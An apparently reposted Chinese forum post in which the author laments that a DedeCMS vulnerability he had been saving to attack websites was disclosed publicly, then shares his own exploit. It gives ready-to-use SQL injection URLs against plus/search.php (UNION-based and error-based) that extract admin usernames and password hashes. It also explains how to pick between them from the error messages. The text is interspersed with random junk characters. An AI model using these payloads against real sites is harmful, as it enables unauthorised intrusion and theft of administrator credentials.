转载不加作者名的没JJ$ r: D; w4 [1 ~4 B: s" z5 A- y
+ E/ j, Q: p; ~& Q9 r9 _& j
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
0 o1 L7 X. H- `: U% U& j9 T: L+ ]6 |
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
* E7 y# M+ O$ W8 j/ Y: A# F9 Q: q, @) R- |
我一般是这样测试的:
& |$ {1 ~0 `$ b. {+ A! K* r v
; m- U% K. s7 ]$ H提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a* f9 E( D1 A& d! [7 ^
$ D; y y! k% y/ C8 i( d转载不加作者名的没JJ8 \# l- @" n6 f3 u+ b
9 t$ h# t- R9 R2 r1 }8 C作者:鬼哥1 K3 C9 z" c* G+ x2 g8 _
. x; }7 X" ~# C3 y
+ @$ G J: o9 V# ~
$ P* a$ M- ]+ P6 W+ e" A1 ^2 X/ B
看结果如果提示
3 p' w" O4 p. g. R
& b" ^0 D, F7 c* g- W' w7 SSafe Alert: Request Error step 2 !
) {* |; l; ~7 ^: x
6 W6 j# O# V# }5 P( @0 j: B1 Z那么直接用下面的exp# D) q/ w% S* B8 C
" E- E: h- a" ~' Y# I2 \6 [xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a% Z, X% E+ o" R5 X0 a8 {
$ U& k) J$ L( L& ?% q
2 w! r/ F2 B" R" y/ O7 k看结果如果提示8 t5 j ^1 o" u
. f$ m. G8 z% H0 E0 \8 h
Safe Alert: Request Error step 1 !# X3 }. n4 H" T7 O
+ I( c' F4 i( \+ L
那么直接用下面的exp
- u; R# ]8 [/ A5 s, ~% Z1 u" S3 {- L+ o# `
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a/ Q: d: v% ~/ K/ a
A% |: H2 Q. Q/ {1 Q
! w( X! [7 K$ @! V' p% J1 ~- C) ?如果正常显示证明漏洞不存在了。
# a- c' |, f4 l3 B/ p V) K
3 |2 [9 U4 d( c2 m) ]; V+ K转载不加作者名的没JJ |